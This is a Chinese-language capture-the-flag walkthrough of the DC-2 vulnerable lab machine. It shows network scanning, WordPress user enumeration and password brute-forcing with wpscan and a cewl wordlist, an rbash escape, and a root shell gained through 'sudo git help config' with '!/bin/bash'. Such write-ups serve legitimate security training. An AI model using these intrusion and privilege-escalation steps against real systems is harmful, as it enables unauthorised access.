DC2--渗透靶场

准备一个kali和DC2,并处于同一个网段(我这里用的NAT模式)

信息收集

arp-scan -l //查看同网段的IP

mho60ztx.png

nmap -A -p- DC2的IP //查看开放了哪些端口

发现之开放了80端口(访问web服务)
mho62wk4.png
这里做了域名解析,需要在本地kali的配置文件“/etc/hosts”文件写入"x.x.x.x dc2"(DC的IP)

nano /etc/hosts

mhoedtcq.png
使用浏览器登录网页
mhoegv8t.png
大概意思是让我们使用cwel这个工具
mhoein68.png

wpscan --url dc-2 -e u

mhogs5gz.png
可以得到3个用户
mhoh0ruv.png

cewl http://de-2 -w dc2_pass.txt

mhohdaxn.png
在主目录下会有一个dc2_pass.txt的文件,里面就是网页的所有关键字
mhohg3uk.png
在浏览器里找到这个网页的后台

http://dc2/wp-admin

mhohmng9.png

wpscan --url dc-2 -U tom -P dc2_pass.txt

mhohrdrk.png
可以得出tom的密码是parturient
mhohrsgi.png
使用bp找到了jerry的密码(adipiscing)(时间紧张的情况下不支持使用bp速度太慢了【kali自带的bp】)
mhohwbim.png
登录一下jerry,发现有一个flag
mhoi146d.png
远程登录一下tom

ssh tom@dc的IP -p 7744

mhojcve3.png
查看一下内容,发现rbash限制
mhojhnax.png

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

mhojocf0.png
查看一下内容
mhojqwfe.png
可怜的老 Tom 总是追着 Jerry 跑。也许他该为造成的所有压力而 su(切换用户)
mhojuprp.png
很高兴看到你已坚持到这里——但你还没有成功。
你仍然需要获取最终的 flag(唯一真正重要的 flag!!!)。
这里没有提示——现在你只能靠自己了。:-)
去吧——git 离开这里吧!!!

输入:
sudo git help config
不要退出,在里面输入:
!/bin/bash 然后按回车键

mhok0xpl.png
可以切换到root
mhok7ypq.png
找到了最后一个flag
mhok9r3t.png
Congratulatons!!!

无标签
评论区
头像